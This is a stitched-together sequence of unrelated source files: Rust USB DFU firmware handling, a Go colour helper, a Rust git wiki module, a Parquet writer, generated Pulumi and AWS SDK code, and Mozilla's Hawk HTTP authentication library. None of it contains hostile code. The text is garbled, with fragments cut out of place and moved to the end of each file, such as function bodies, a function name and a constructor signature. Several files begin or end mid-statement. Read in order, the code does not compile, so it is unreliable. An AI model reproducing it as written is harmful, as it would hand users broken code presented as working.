= DfuState::DfuDnloadSync; accept_status(xfer, &self, 500); }, DfuState::DfuManifest => { if self.manifesting { accept_status(xfer, &self, 500); } else { self.state = DfuState::DfuManifestSync;
}, DfuState::DfuManifestSync => { self.state = DfuState::DfuIdle; accept_status(xfer, &self, 0); }, _ => accept_status(xfer, &self, 0), } }, dfu_request::DFU_GETSTATE if req.value == 0 && req.length == 1 => { xfer.accept_with(&[ self.state as u8 ]).ok(); }, _ => { self.state = DfuState::DfuError; self.status = DfuDeviceStatus::ErrStaledPkt; util::_log_fmt(format_args!("Stalled pkt req: {:?}\r\n", req)); xfer.reject().ok(); }, } } fn control_out<'a>(&mut self, xfer: ControlOut<B>) { let req = *xfer.request(); if !(req.request_type == control::RequestType::Class && req.recipient == control::Recipient::Interface && req.index == u8::from(self.comm_if) as u16) { return; } match req.request { dfu_request::DFU_DNLOAD if self.download_capable => { if req.length > 0 { match self.state { DfuState::DfuIdle | DfuState::DfuDnloadIdle => { unsafe{ flash::unlock_flash(); } let start = self.page_buffer_index; //let len = req.length as usize; let len = xfer.data().len(); let page_size = unsafe { flash::get_flash_pg_size() }; self.page_buffer[start..start+len] .copy_from_slice(&xfer.data()[..len]); self.page_buffer_index = start + len; if self.page_buffer_index == page_size as usize { self.awaits_flash = true; } self.state = DfuState::DfuDnloadSync; xfer.accept().ok(); }, _ => {xfer.reject().ok();}, } } else { self.state = DfuState::DfuManifest; self.manifesting = true; self.awaits_flash = true; xfer.accept().ok(); } }, dfu_request::DFU_CLRSTATUS if req.value == 0 && req.length == 0 => { match self.state { DfuState::DfuError => { self.state = DfuState::DfuIdle; self.status = DfuDeviceStatus::Ok; xfer.accept().ok(); }, _ => {xfer.reject().ok();}, } }, dfu_request::DFU_ABORT if req.value == 0 && req.length == 0 => { match self.state { DfuState::DfuIdle => { self.status = DfuDeviceStatus::Ok; xfer.accept().ok(); }, _ => {xfer.reject().ok();} } }, _ => { self.state = DfuState::DfuError; self.status = DfuDeviceStatus::ErrStaledPkt; xfer.reject().ok(); }, } } }
accept_status(xfer, &self, 0); }
color.go
// The MIT License // // Copyright (c) 2020 Temporal Technologies Inc. All rights reserved. // // Copyright (c) 2020 Uber Technologies, Inc. // // Permission is hereby granted, free of charge, to any person obtaining a copy // of this software and associated documentation files (the "Software"), to deal // in the Software without restriction, including without limitation the rights // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell // copies of the Software, and to permit persons to whom the Software is // furnished to do so, subject to the following conditions: // // The above copyright notice and this permission notice shall be included in // all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN // THE SOFTWARE. package color import ( "github.com/fatih/color" "github.com/urfave/cli/v2" ) const ( FlagColor = "color" ) type ColorOption string const ( Auto ColorOption = "auto" Always ColorOption = "always" Never ColorOption = "never" ) var ( colorGreen = color.New(color.FgGreen).SprintfFunc() colorMagenta = color.New(color.FgMagenta).SprintfFunc() colorRed = color.New(color.FgRed).SprintfFunc() ) func Green(c *cli.Context, format string, a ...interface{}) string
func Magenta(c *cli.Context, format string, a ...interface{}) string { checkColor(c) return colorMagenta(format, a...) } func Yellow(c *cli.Context, format string, a ...interface{}) string { checkColor(c) return color.YellowString(format, a...) } func Red(c *cli.Context, format string, a ...interface{}) string { checkColor(c) return colorRed(format, a...) } func checkColor(c *cli.Context) { colorFlag := c.String(FlagColor) colorVal := ColorOption(colorFlag) switch colorVal { case Always: color.NoColor = false case Never: color.NoColor = true default: // auto // handled by color pkg // tty - color. non-tty - false } }
{ checkColor(c) return colorGreen(format, a...) }
git.rs
pub mod read; pub mod write; pub use read::HistoryEntry; use crate::article::ArticlePath; use git2::Repository; use std::{fs, io::Write, os::unix::prelude::*, path::PathBuf}; use tokio::sync::Mutex; // FIXME: better error messages #[derive(thiserror::Error, Debug)] pub enum Error { #[error("git2 error: {0}")] Git2(#[from] git2::Error), #[error("Could not open or init repository in path {}: {}", path.display(), err)] RepoOpen { path: PathBuf, err: git2::Error }, #[error("Can't create post-receive-hook: {}", _0)] HookCreate(std::io::Error), } impl warp::reject::Reject for Error {} pub struct Repo { path: PathBuf, repo: Mutex<Repository>, } impl Repo { pub fn open_or_init(path: PathBuf, home_page: &str) -> Result<Self, Error> { let repo_path = path.clone(); let repo = match Repository::open_bare(&repo_path) { Err(e) if e.code() == git2::ErrorCode::NotFound => { let repo = Repository::init_bare(&repo_path)?; let article = crate::article::WikiArticle::from_title( crate::article::ArticleTitle::new(home_page.to_owned()), ); write::write_and_commit_file( &repo, None, &write::CommitInfo { path: &article.path, signature: git2::Signature::now("system", "system").unwrap(), msg: "Initial commit", }, "This is the home page of your new wiki. Click on edit to put something here.", )?; let post_receive_hook = askama::Template::render(&crate::templates::PostReceiveHook::new()).unwrap(); let hook_path = path.join("hooks/post-receive"); let ret: Result<(), std::io::Error> = try { let mut file = fs::OpenOptions::new() .mode(0o755) .write(true) .create(true) .open(hook_path)?; file.write(post_receive_hook.as_bytes())?; file.flush()?; }; ret.map_err(Error::HookCreate)?; Ok(repo) } other => other, }; match repo { Ok(repo) => Ok(Self { path, repo: Mutex::new(repo), }), Err(e) => Err(Error::RepoOpen { path, err: e }), } } pub fn read(&self) -> Result<read::ReadOnly, Error> { let repo = Repository::open_bare(&self.path)?; Ok(read::ReadOnly { repo }) } pub async fn write(&self) -> write::RepoLock<'_> { write::RepoLock { repo: self.repo.lock().await, } } } fn repo_head(repo: &Repository) -> Result<Option<git2::Reference<'_>>, git2::Error> { match repo.head() { Ok(head) => Ok(Some(head)), Err(e) if e.code() == git2::ErrorCode::UnbornBranch => Ok(None), Err(e) => Err(e), } } fn get_tree_path<'a>( tree: &'a git2::Tree, path: &ArticlePath, ) -> Result<Option<git2::TreeEntry<'a>>, git2::Error> { match tree.get_path(path.as_ref()) { Ok(ent) => Ok(Some(ent)), Err(e) if e.code() == git2::ErrorCode::NotFound => Ok(None), Err(e) => Err(e), } } fn get_blob_oid<'a>( tree: &'a git2::Tree, tree_path: &ArticlePath, ) -> Result<Option<git2::Oid>, Error> { match get_tree_path(&tree, tree_path)? { Some(ent) if ent.kind() == Some(git2::ObjectType::Blob) => Ok(Some(ent.id())), _ => Ok(None), } } fn
<'a>( repo: &'a Repository, tree: &git2::Tree, path: &ArticlePath, ) -> Result<Option<git2::Blob<'a>>, git2::Error> { let ent = match get_tree_path(tree, path)? { Some(ent) => ent, None => return Ok(None), }; let obj = ent.to_object(repo)?; match obj.into_blob() { Ok(blob) => Ok(Some(blob)), Err(_) => Ok(None), } }
get_as_blob
user.subscription.js
module.exports = { user: { subscribe: (parent, args, { pubsub }) => pubsub.asyncIterator('user createad') }
};
column_chunk.rs
use std::collections::HashSet; use std::convert::TryInto; use std::io::Write; use futures::AsyncWrite; use parquet_format_async_temp::thrift::protocol::{ TCompactOutputProtocol, TCompactOutputStreamProtocol, TOutputProtocol, TOutputStreamProtocol, }; use parquet_format_async_temp::{ColumnChunk, ColumnMetaData}; use crate::statistics::serialize_statistics; use crate::FallibleStreamingIterator; use crate::{ compression::Compression, encoding::Encoding, error::{ParquetError, Result}, metadata::ColumnDescriptor, page::{CompressedPage, PageType}, schema::types::{physical_type_to_type, ParquetType}, }; use super::page::{write_page, write_page_async, PageWriteSpec}; use super::statistics::reduce; use super::DynStreamingIterator; pub fn write_column_chunk<'a, W, E>( writer: &mut W, mut offset: u64, descriptor: &ColumnDescriptor, compression: Compression, mut compressed_pages: DynStreamingIterator<'a, CompressedPage, E>, ) -> Result<(ColumnChunk, u64)> where W: Write, ParquetError: From<E>, E: std::error::Error, { // write every page let initial = offset; let mut specs = vec![]; while let Some(compressed_page) = compressed_pages.next()? { let spec = write_page(writer, offset, compressed_page)?; offset += spec.bytes_written; specs.push(spec); } let mut bytes_written = offset - initial; let column_chunk = build_column_chunk(&specs, descriptor, compression)?; // write metadata let mut protocol = TCompactOutputProtocol::new(writer); bytes_written += column_chunk.meta_data.as_ref().unwrap().write_to_out_protocol(&mut protocol)? as u64; protocol.flush()?; Ok((column_chunk, bytes_written)) } pub async fn write_column_chunk_async<W, E>( writer: &mut W, mut offset: u64, descriptor: &ColumnDescriptor, compression: Compression, mut compressed_pages: DynStreamingIterator<'_, CompressedPage, E>, ) -> Result<(ColumnChunk, usize)> where W: AsyncWrite + Unpin + Send, ParquetError: From<E>, E: std::error::Error, { let initial = offset; // write every page let mut specs = vec![]; while let Some(compressed_page) = compressed_pages.next()? { let spec = write_page_async(writer, offset, compressed_page).await?; offset += spec.bytes_written; specs.push(spec); } let mut bytes_written = (offset - initial) as usize; let column_chunk = build_column_chunk(&specs, descriptor, compression)?; // write metadata let mut protocol = TCompactOutputStreamProtocol::new(writer); bytes_written += column_chunk.meta_data.as_ref().unwrap() .write_to_out_stream_protocol(&mut protocol) .await?; protocol.flush().await?; Ok((column_chunk, bytes_written)) } fn build_column_chunk( specs: &[PageWriteSpec], descriptor: &ColumnDescriptor, compression: Compression, ) -> Result<ColumnChunk> { // compute stats to build header at the end of the chunk // SPEC: the total compressed size is the total compressed size of each page + the header size let total_compressed_size = specs .iter() .map(|x| x.header_size as i64 + x.header.compressed_page_size as i64) .sum(); // SPEC: the total compressed size is the total compressed size of each page + the header size let total_uncompressed_size = specs .iter() .map(|x| x.header_size as i64 + x.header.uncompressed_page_size as i64) .sum(); let data_page_offset = specs.first().map(|spec| spec.offset).unwrap_or(0) as i64; let num_values = specs .iter() .map(|spec| { let type_ = spec.header.type_.try_into().unwrap(); match type_ { PageType::DataPage => { spec.header.data_page_header.as_ref().unwrap().num_values as i64 } PageType::DataPageV2 =>
_ => 0, // only data pages contribute } }) .sum(); let encodings = specs .iter() .map(|spec| { let type_ = spec.header.type_.try_into().unwrap(); match type_ { PageType::DataPage => vec![ spec.header.data_page_header.as_ref().unwrap().encoding, Encoding::Rle.into(), ], PageType::DataPageV2 => { vec![ spec.header.data_page_header_v2.as_ref().unwrap().encoding, Encoding::Rle.into(), ] } PageType::DictionaryPage => vec![ spec.header .dictionary_page_header .as_ref() .unwrap() .encoding, ], _ => todo!(), } }) .flatten() .collect::<HashSet<_>>() // unique .into_iter() // to vec .collect(); let statistics = specs.iter().map(|x| &x.statistics).collect::<Vec<_>>(); let statistics = reduce(&statistics)?; let statistics = statistics.map(|x| serialize_statistics(x.as_ref())); let type_ = match descriptor.type_() { ParquetType::PrimitiveType { physical_type, .. } => physical_type_to_type(physical_type).0, _ => { return Err(general_err!( "Trying to write a row group of a non-physical type" )) } }; let metadata = ColumnMetaData { type_, encodings, path_in_schema: descriptor.path_in_schema().to_vec(), codec: compression.into(), num_values, total_uncompressed_size, total_compressed_size, key_value_metadata: None, data_page_offset, index_page_offset: None, dictionary_page_offset: None, statistics, encoding_stats: None, bloom_filter_offset: None, }; Ok(ColumnChunk { file_path: None, // same file for now. file_offset: data_page_offset + total_compressed_size, meta_data: Some(metadata), offset_index_offset: None, offset_index_length: None, column_index_offset: None, column_index_length: None, crypto_metadata: None, encrypted_column_metadata: None, }) }
{ spec.header.data_page_header_v2.as_ref().unwrap().num_values as i64 }
load_balancer.py
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import pulumi import pulumi.runtime class LoadBalancer(pulumi.CustomResource): """ Manages a V2 loadbalancer resource within OpenStack. """
"""Create a LoadBalancer resource with the given unique name, props, and options.""" if not __name__: raise TypeError('Missing resource name argument (for URN creation)') if not isinstance(__name__, basestring): raise TypeError('Expected resource name to be a string') if __opts__ and not isinstance(__opts__, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') __props__ = dict() if admin_state_up and not isinstance(admin_state_up, bool): raise TypeError('Expected property admin_state_up to be a bool') __self__.admin_state_up = admin_state_up """ The administrative state of the Loadbalancer. A valid value is true (UP) or false (DOWN). """ __props__['adminStateUp'] = admin_state_up if description and not isinstance(description, basestring): raise TypeError('Expected property description to be a basestring') __self__.description = description """ Human-readable description for the Loadbalancer. """ __props__['description'] = description if flavor and not isinstance(flavor, basestring): raise TypeError('Expected property flavor to be a basestring') __self__.flavor = flavor """ The UUID of a flavor. Changing this creates a new loadbalancer. """ __props__['flavor'] = flavor if loadbalancer_provider and not isinstance(loadbalancer_provider, basestring): raise TypeError('Expected property loadbalancer_provider to be a basestring') __self__.loadbalancer_provider = loadbalancer_provider """ The name of the provider. Changing this creates a new loadbalancer. """ __props__['loadbalancerProvider'] = loadbalancer_provider if name and not isinstance(name, basestring): raise TypeError('Expected property name to be a basestring') __self__.name = name """ Human-readable name for the Loadbalancer. Does not have to be unique. """ __props__['name'] = name if region and not isinstance(region, basestring): raise TypeError('Expected property region to be a basestring') __self__.region = region """ The region in which to obtain the V2 Networking client. A Networking client is needed to create an LB member. If omitted, the `region` argument of the provider is used. Changing this creates a new LB member. """ __props__['region'] = region if security_group_ids and not isinstance(security_group_ids, list): raise TypeError('Expected property security_group_ids to be a list') __self__.security_group_ids = security_group_ids """ A list of security group IDs to apply to the loadbalancer. The security groups must be specified by ID and not name (as opposed to how they are configured with the Compute Instance). """ __props__['securityGroupIds'] = security_group_ids if tenant_id and not isinstance(tenant_id, basestring): raise TypeError('Expected property tenant_id to be a basestring') __self__.tenant_id = tenant_id """ Required for admins. The UUID of the tenant who owns the Loadbalancer. Only administrative users can specify a tenant UUID other than their own. Changing this creates a new loadbalancer. """ __props__['tenantId'] = tenant_id if vip_address and not isinstance(vip_address, basestring): raise TypeError('Expected property vip_address to be a basestring') __self__.vip_address = vip_address """ The ip address of the load balancer. Changing this creates a new loadbalancer. """ __props__['vipAddress'] = vip_address if not vip_subnet_id: raise TypeError('Missing required property vip_subnet_id') elif not isinstance(vip_subnet_id, basestring): raise TypeError('Expected property vip_subnet_id to be a basestring') __self__.vip_subnet_id = vip_subnet_id """ The network on which to allocate the Loadbalancer's address. A tenant can only create Loadbalancers on networks authorized by policy (e.g. networks that belong to them or networks that are shared). Changing this creates a new loadbalancer. """ __props__['vipSubnetId'] = vip_subnet_id __self__.vip_port_id = pulumi.runtime.UNKNOWN """ The Port ID of the Load Balancer IP. """ super(LoadBalancer, __self__).__init__( 'openstack:loadbalancer/loadBalancer:LoadBalancer', __name__, __props__, __opts__) def set_outputs(self, outs): if 'adminStateUp' in outs: self.admin_state_up = outs['adminStateUp'] if 'description' in outs: self.description = outs['description'] if 'flavor' in outs: self.flavor = outs['flavor'] if 'loadbalancerProvider' in outs: self.loadbalancer_provider = outs['loadbalancerProvider'] if 'name' in outs: self.name = outs['name'] if 'region' in outs: self.region = outs['region'] if 'securityGroupIds' in outs: self.security_group_ids = outs['securityGroupIds'] if 'tenantId' in outs: self.tenant_id = outs['tenantId'] if 'vipAddress' in outs: self.vip_address = outs['vipAddress'] if 'vipPortId' in outs: self.vip_port_id = outs['vipPortId'] if 'vipSubnetId' in outs: self.vip_subnet_id = outs['vipSubnetId']
def __init__(__self__, __name__, __opts__=None, admin_state_up=None, description=None, flavor=None, loadbalancer_provider=None, name=None, region=None, security_group_ids=None, tenant_id=None, vip_address=None, vip_subnet_id=None):
api_op_UpdateDirectConnectGatewayAssociation.go
// Code generated by smithy-go-codegen DO NOT EDIT. package directconnect import ( "context" awsmiddleware "github.com/aws/aws-sdk-go-v2/aws/middleware" "github.com/aws/aws-sdk-go-v2/aws/signer/v4" "github.com/aws/aws-sdk-go-v2/service/directconnect/types" "github.com/awslabs/smithy-go/middleware" smithyhttp "github.com/awslabs/smithy-go/transport/http" ) // Updates the specified attributes of the Direct Connect gateway association. Add // or remove prefixes from the association. func (c *Client) UpdateDirectConnectGatewayAssociation(ctx context.Context, params *UpdateDirectConnectGatewayAssociationInput, optFns ...func(*Options)) (*UpdateDirectConnectGatewayAssociationOutput, error) { if params == nil { params = &UpdateDirectConnectGatewayAssociationInput{} } result, metadata, err := c.invokeOperation(ctx, "UpdateDirectConnectGatewayAssociation", params, optFns, addOperationUpdateDirectConnectGatewayAssociationMiddlewares) if err != nil { return nil, err } out := result.(*UpdateDirectConnectGatewayAssociationOutput) out.ResultMetadata = metadata return out, nil } type UpdateDirectConnectGatewayAssociationInput struct { // The Amazon VPC prefixes to advertise to the Direct Connect gateway. AddAllowedPrefixesToDirectConnectGateway []*types.RouteFilterPrefix // The ID of the Direct Connect gateway association. AssociationId *string // The Amazon VPC prefixes to no longer advertise to the Direct Connect gateway. RemoveAllowedPrefixesToDirectConnectGateway []*types.RouteFilterPrefix } type UpdateDirectConnectGatewayAssociationOutput struct { // Information about an association between a Direct Connect gateway and a virtual // private gateway or transit gateway. DirectConnectGatewayAssociation *types.DirectConnectGatewayAssociation // Metadata pertaining to the operation's result. ResultMetadata middleware.Metadata } func addOperationUpdateDirectConnectGatewayAssociationMiddlewares(stack *middleware.Stack, options Options) (err error) { err = stack.Serialize.Add(&awsAwsjson11_serializeOpUpdateDirectConnectGatewayAssociation{}, middleware.After) if err != nil { return err } err = stack.Deserialize.Add(&awsAwsjson11_deserializeOpUpdateDirectConnectGatewayAssociation{}, middleware.After) if err != nil { return err } if err = addSetLoggerMiddleware(stack, options); err != nil { return err } if err = awsmiddleware.AddClientRequestIDMiddleware(stack); err != nil { return err } if err = smithyhttp.AddComputeContentLengthMiddleware(stack); err != nil { return err } if err = addResolveEndpointMiddleware(stack, options); err != nil { return err } if err = v4.AddComputePayloadSHA256Middleware(stack); err != nil { return err } if err = addRetryMiddlewares(stack, options); err != nil { return err } if err = addHTTPSignerV4Middleware(stack, options); err != nil { return err } if err = awsmiddleware.AddAttemptClockSkewMiddleware(stack); err != nil { return err } if err = addClientUserAgent(stack); err != nil
if err = smithyhttp.AddErrorCloseResponseBodyMiddleware(stack); err != nil { return err } if err = smithyhttp.AddCloseResponseBodyMiddleware(stack); err != nil { return err } if err = stack.Initialize.Add(newServiceMetadataMiddleware_opUpdateDirectConnectGatewayAssociation(options.Region), middleware.Before); err != nil { return err } if err = addRequestIDRetrieverMiddleware(stack); err != nil { return err } if err = addResponseErrorMiddleware(stack); err != nil { return err } if err = addRequestResponseLogging(stack, options); err != nil { return err } return nil } func newServiceMetadataMiddleware_opUpdateDirectConnectGatewayAssociation(region string) *awsmiddleware.RegisterServiceMetadata { return &awsmiddleware.RegisterServiceMetadata{ Region: region, ServiceID: ServiceID, SigningName: "directconnect", OperationName: "UpdateDirectConnectGatewayAssociation", } }
{ return err }
hawk.go
// Package hawk implements the Hawk HTTP authentication scheme. package hawk /* import "go.mozilla.org/hawk" */ import ( "bytes" "crypto/hmac" "crypto/rand" "crypto/sha256" "encoding/base64" "fmt" "hash" "io" "net" "net/http" "net/url" "regexp" "strconv" "strings" "time" ) // Now is a func() time.Time that is used by the package to get the current time. var Now = time.Now // MaxTimestampSkew is the maximum ±skew that a request timestamp can have without returning ErrTimestampSkew. var MaxTimestampSkew = time.Minute var ( ErrNoAuth = AuthError("no Authorization header or bewit parameter found") ErrReplay = AuthError("request nonce is being replayed") ErrInvalidMAC = AuthError("invalid MAC") ErrBewitExpired = AuthError("bewit expired") ErrTimestampSkew = AuthError("timestamp skew too high") ErrMissingServerAuth = AuthError("missing Server-Authentication header") ErrInvalidBewitMethod = AuthError("bewit only allows HEAD and GET requests") ) type AuthError string func (e AuthError) Error() string { return "hawk: " + string(e) } type CredentialErrorType int const ( UnknownID CredentialErrorType = iota UnknownApp IDAppMismatch ) func (t CredentialErrorType) String() string { switch t { case UnknownApp: return "unknown app" case IDAppMismatch: return "id/app mismatch" } return "unknown id" } // CredentialError is returned by a CredentialsLookupFunc when the provided credentials // ID is invalid. type CredentialError struct { Type CredentialErrorType Credentials *Credentials } func (e *CredentialError) Error() string { return fmt.Sprintf("hawk: credential error with id %s and app %s: %s", e.Credentials.ID, e.Credentials.App, e.Type) } type Credentials struct { ID string Key string Hash func() hash.Hash // Data may be set in a CredentialsLookupFunc to correlate the credentials // with an internal data record. Data interface{} App string Delegate string } func (creds *Credentials) MAC() hash.Hash { if creds.Hash != nil { return hmac.New(creds.Hash, []byte(creds.Key)) } else { // use a default hash return hmac.New(sha256.New, []byte(creds.Key)) } } type AuthType int const ( AuthHeader AuthType = iota AuthResponse AuthBewit ) func (a AuthType) String() string { switch a { case AuthResponse: return "response" case AuthBewit: return "bewit" default: return "header" } } // A CredentialsLookupFunc is called by NewAuthFromRequest after parsing the // request auth. The Credentials will never be nil and ID will always be set. // App and Delegate will be set if provided in the request. This function must // look up the corresponding Key and Hash and set them on the provided // Credentials. If the Key/Hash are found and the App/Delegate are valid (if // provided) the error should be nil. If the Key or App could not be found or // the App does not match the ID, then a CredentialError must be returned. // Errors will propagate to the caller of NewAuthFromRequest, so internal errors // may be returned. type CredentialsLookupFunc func(*Credentials) error // A NonceCheckFunc is called by NewAuthFromRequest and should make sure that // the provided nonce is unique within the context of the provided time.Time and // Credentials. It should return false if the nonce is being replayed. type NonceCheckFunc func(string, time.Time, *Credentials) bool type AuthFormatError struct { Field string Err string } func (e AuthFormatError) Error() string { return "hawk: invalid " + e.Field + ", " + e.Err } // ParseRequestHeader parses a Hawk header (provided in the Authorization // HTTP header) and populates an Auth. If an error is returned it will always be // of type AuthFormatError. func ParseRequestHeader(header string) (*Auth, error) { auth := &Auth{ActualTimestamp: Now()} err := auth.ParseHeader(header, AuthHeader) if err != nil { return nil, err } if auth.Credentials.ID == "" { return nil, AuthFormatError{"id", "missing or empty"} } if auth.Timestamp.IsZero() { return nil, AuthFormatError{"ts", "missing, empty, or zero"} } if auth.Nonce == "" { return nil, AuthFormatError{"nonce", "missing or empty"} } auth.ReqHash = true return auth, nil } // ParseBewit parses a bewit token provided in a URL parameter and populates an // Auth. If an error is returned it will always be of type AuthFormatError. func ParseBewit(bewit string) (*Auth, error) { if len(bewit)%4 != 0 { bewit += strings.Repeat("=", 4-len(bewit)%4) } decoded, err := base64.URLEncoding.DecodeString(bewit) if err != nil { return nil, AuthFormatError{"bewit", "malformed base64 encoding"} } components := bytes.SplitN(decoded, []byte(`\`), 4) if len(components) != 4 { return nil, AuthFormatError{"bewit", "missing components"} } auth := &Auth{ Credentials: Credentials{ID: string(components[0])}, Ext: string(components[3]), Method: "GET", ActualTimestamp: Now(), IsBewit: true, } ts, err := strconv.ParseInt(string(components[1]), 10, 64) if err != nil { return nil, AuthFormatError{"ts", "not an integer"} } auth.Timestamp = time.Unix(ts, 0) auth.MAC = make([]byte, base64.StdEncoding.DecodedLen(len(components[2]))) n, err := base64.StdEncoding.Decode(auth.MAC, components[2]) if err != nil { return nil, AuthFormatError{"mac", "malformed base64 encoding"} } auth.MAC = auth.MAC[:n] return auth, nil } // NewAuthFromRequest parses a request containing an Authorization header or // bewit parameter and populates an Auth. If creds is not nil it will be called // to look up the associated credentials. If nonce is not nil it will be called // to make sure the nonce is not replayed. // // If the request does not contain a bewit or Authorization header, ErrNoAuth is // returned. If the request contains a bewit and it is not a GET or HEAD // request, ErrInvalidBewitMethod is returned. If there is an error parsing the // provided auth details, an AuthFormatError will be returned. If creds returns // an error, it will be returned. If nonce returns false, ErrReplay will be // returned. func NewAuthFromRequest(req *http.Request, creds CredentialsLookupFunc, nonce NonceCheckFunc) (*Auth, error) { header := req.Header.Get("Authorization") bewit := req.URL.Query().Get("bewit") var auth *Auth var err error if header != "" { auth, err = ParseRequestHeader(header) if err != nil { return nil, err } } if auth == nil && bewit != "" { if req.Method != "GET" && req.Method != "HEAD" { return nil, ErrInvalidBewitMethod } auth, err = ParseBewit(bewit) if err != nil { return nil, err } } if auth == nil { return nil, ErrNoAuth } auth.Method = req.Method auth.RequestURI = extractRequestURI(req) if bewit != "" { auth.Method = "GET" bewitPattern, _ := regexp.Compile(`\?bewit=` + bewit + `\z|bewit=` + bewit + `&|&bewit=` + bewit + `\z`) auth.RequestURI = bewitPattern.ReplaceAllString(auth.RequestURI, "") } auth.Host, auth.Port = extractReqHostPort(req) if creds != nil { err = creds(&auth.Credentials) if err != nil { return nil, err } } if nonce != nil && !auth.IsBewit && !nonce(auth.Nonce, auth.Timestamp, &auth.Credentials) { return nil, ErrReplay } return auth, nil } func extractReqHostPort(req *http.Request) (host string, port string) { if idx := strings.Index(req.Host, ":"); idx != -1 { host, port, _ = net.SplitHostPort(req.Host) } else { host = req.Host } if req.URL.Host != "" { if idx := strings.Index(req.Host, ":"); idx != -1 { host, port, _ = net.SplitHostPort(req.Host) } else { host = req.URL.Host } } if port == "" { if req.URL.Scheme == "http" {
else { port = "443" } } return } func extractRequestURI(req *http.Request) string { uri := req.URL.Path if req.URL.RawQuery != "" { uri += "?" + req.URL.RawQuery } return uri } // NewRequestAuth builds a client Auth based on req and creds. tsOffset will be // applied to Now when setting the timestamp. func NewRequestAuth(req *http.Request, creds *Credentials, tsOffset time.Duration) *Auth { auth := &Auth{ Method: req.Method, Credentials: *creds, Timestamp: Now().Add(tsOffset), Nonce: nonce(), RequestURI: extractRequestURI(req), } auth.Host, auth.Port = extractReqHostPort(req) return auth } // NewURLAuth builds a client Auth based on uri and creds. tsOffset will be // applied to Now when setting the timestamp. func NewURLAuth(uri string, creds *Credentials, tsOffset time.Duration) (*Auth, error) { u, err := url.Parse(uri) if err != nil { return nil, err } auth := &Auth{ Method: "GET", Credentials: *creds, Timestamp: Now().Add(tsOffset), } if u.Path != "" { // url.Parse unescapes the path, which is unexpected auth.RequestURI = "/" + strings.SplitN(uri[8:], "/", 2)[1] } else { auth.RequestURI = "/" } auth.Host, auth.Port = extractURLHostPort(u) return auth, nil } func extractURLHostPort(u *url.URL) (host string, port string) { if idx := strings.Index(u.Host, ":"); idx != -1 { host, port, _ = net.SplitHostPort(u.Host) } else { host = u.Host } if port == "" { if u.Scheme == "http" { port = "80" } else { port = "443" } } return } func nonce() string { b := make([]byte, 8) _, err := io.ReadFull(rand.Reader, b) if err != nil { panic(err) } return base64.StdEncoding.EncodeToString(b)[:8] } const headerVersion = "1" type Auth struct { Credentials Credentials Method string RequestURI string Host string Port string MAC []byte Nonce string Ext string Hash []byte // ReqHash is true if the request contained a hash ReqHash bool IsBewit bool Timestamp time.Time // ActualTimestamp is when the request was received ActualTimestamp time.Time } // field is of form: key="value" func lexField(r *strings.Reader) (string, string, error) { key := make([]byte, 0, 5) val := make([]byte, 0, 32) // read the key for { ch, _ := r.ReadByte() if ch == '=' { break } if ch < 'a' || ch > 'z' { // fail if not ASCII lowercase letter return "", "", AuthFormatError{"header", "cannot parse header field"} } key = append(key, ch) } if ch, _ := r.ReadByte(); ch != '"' { return "", "", AuthFormatError{string(key), "cannot parse value"} } // read the value for { ch, _ := r.ReadByte() if ch == '"' { break } // character class is ASCII printable [\x20-\x7E] without \ and " if ch < 0x20 || ch > 0x7E || ch == '\\' { return "", "", AuthFormatError{string(key), "cannot parse value"} } val = append(val, ch) } return string(key), string(val), nil } func lexHeader(header string) (map[string]string, error) { params := make(map[string]string, 8) r := strings.NewReader(header) for { ch, eof := r.ReadByte() if eof != nil { break } switch { case ch == ' ' || ch == '\t' || ch == ',': //ignore spaces and commas case ch >= 'a' && ch <= 'z': //beginning of key/value pair like 'id="abcdefg"' r.UnreadByte() key, val, err := lexField(r) if err != nil { return params, err } params[key] = val default: //invalid character encountered return params, AuthFormatError{"header", "cannot parse header"} } } return params, nil } // ParseHeader parses a Hawk request or response header and populates auth. // t must be AuthHeader if the header is an Authorization header from a request // or AuthResponse if the header is a Server-Authorization header from // a response. func (auth *Auth) ParseHeader(header string, t AuthType) error { if len(header) < 4 || strings.ToLower(header[:4]) != "hawk" { return AuthFormatError{"scheme", "must be Hawk"} } fields, err := lexHeader(header[4:]) if err != nil { return err } if hash, ok := fields["hash"]; ok { auth.Hash, err = base64.StdEncoding.DecodeString(hash) if err != nil { return AuthFormatError{"hash", "malformed base64 encoding"} } } auth.Ext = fields["ext"] mac := fields["mac"] if mac == "" { return AuthFormatError{"mac", "missing or empty"} } auth.MAC, err = base64.StdEncoding.DecodeString(mac) if err != nil { return AuthFormatError{"mac", "malformed base64 encoding"} } if t == AuthHeader { auth.Credentials.App = fields["app"] auth.Credentials.Delegate = fields["dlg"] auth.Credentials.ID = fields["id"] if ts, ok := fields["ts"]; ok { tsint, err := strconv.ParseInt(ts, 10, 64) if err != nil { return AuthFormatError{"ts", "not an integer"} } auth.Timestamp = time.Unix(tsint, 0) } auth.Nonce = fields["nonce"] } return nil } // Valid confirms that the timestamp is within skew and verifies the MAC. // // If the request is valid, nil will be returned. If auth is a bewit and the // method is not GET or HEAD, ErrInvalidBewitMethod will be returned. If auth is // a bewit and the timestamp is after the the specified expiry, ErrBewitExpired // will be returned. If auth is from a request header and the timestamp is // outside the maximum skew, ErrTimestampSkew will be returned. If the MAC is // not the expected value, ErrInvalidMAC will be returned. func (auth *Auth) Valid() error { t := AuthHeader if auth.IsBewit { t = AuthBewit if auth.Method != "GET" && auth.Method != "HEAD" { return ErrInvalidBewitMethod } if auth.ActualTimestamp.After(auth.Timestamp) { return ErrBewitExpired } } else { skew := auth.ActualTimestamp.Sub(auth.Timestamp) if abs(skew) > MaxTimestampSkew { return ErrTimestampSkew } } if !hmac.Equal(auth.mac(t), auth.MAC) { if auth.IsBewit && strings.HasPrefix(auth.RequestURI, "http") && len(auth.RequestURI) > 9 { // try just the path uri := auth.RequestURI 